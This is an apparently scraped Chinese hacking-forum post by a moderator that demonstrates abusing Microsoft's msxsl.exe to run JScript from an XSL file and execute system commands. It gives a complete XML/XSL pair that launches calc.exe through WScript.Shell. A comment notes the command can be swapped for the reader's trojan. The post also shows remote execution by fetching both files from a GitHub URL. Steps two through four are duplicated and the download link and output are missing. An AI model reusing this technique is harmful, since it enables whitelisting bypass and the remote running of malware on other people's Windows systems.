taibeihacker
Moderator
1.需要用到微軟工具MSXSL.exe,msxsl.exe是微軟用於命令行下處理XSL的一個程序,所以通過他,我們可以執行JavaScript進而執行系統命令,其下載地址為:
2.執行該工具需要用到2個文件,分別為XML及XSL文件,其命令如下:
msxsl.exe test.xml exec.xsl
test.xml:
?xml version='1.0'?
?xml-stylesheet type='text/xsl' href='exec.xsl' ?
customers
customer
nameMicrosoft/name
/customer
/customers
exec.xsl
?xml version='1.0'?
xsl:stylesheet version='1.0'
xmlns:xsl='http://www.w3.org/1999/XSL/Transform'
xmlns:msxsl='urn:schemas-microsoft-com:xslt'
xmlns:user='http://mycompany.com/mynamespace'
msxsl:script language='JScript' implements-prefix='user'
function xml(nodelist) {
var r=new ActiveXObject('WScript.Shell').Run('cmd /c calc.exe');
//這裡可以改造為執行你的木馬文件如:
//var r=new ActiveXObject('WScript.Shell').Run('cmd /k cd c:\ shell.exe');
return nodelist.nextNode().xml;
}
/msxsl:script
xsl:template match='/'
xsl:value-of select='user:xml(.)'/
/xsl:template
/xsl:stylesheet
3.最終執行結果為:
4.也可以遠程執行:
msxsl.exe https://raw.githubusercontent.com/backlion/demo/master/test.xml https://raw.githubusercontent.com/backlion/demo/master/exec.xsl
2.執行該工具需要用到2個文件,分別為XML及XSL文件,其命令如下:
msxsl.exe test.xml exec.xsl
test.xml:
?xml version='1.0'?
?xml-stylesheet type='text/xsl' href='exec.xsl' ?
customers
customer
nameMicrosoft/name
/customer
/customers
exec.xsl
?xml version='1.0'?
xsl:stylesheet version='1.0'
xmlns:xsl='http://www.w3.org/1999/XSL/Transform'
xmlns:msxsl='urn:schemas-microsoft-com:xslt'
xmlns:user='http://mycompany.com/mynamespace'
msxsl:script language='JScript' implements-prefix='user'
function xml(nodelist) {
var r=new ActiveXObject('WScript.Shell').Run('cmd /c calc.exe');
//這裡可以改造為執行你的木馬文件如:
//var r=new ActiveXObject('WScript.Shell').Run('cmd /k cd c:\ shell.exe');
return nodelist.nextNode().xml;
}
/msxsl:script
xsl:template match='/'
xsl:value-of select='user:xml(.)'/
/xsl:template
/xsl:stylesheet
3.最終執行結果為:
4.也可以遠程執行:
msxsl.exe https://raw.githubusercontent.com/backlion/demo/master/test.xml https://raw.githubusercontent.com/backlion/demo/master/exec.xsl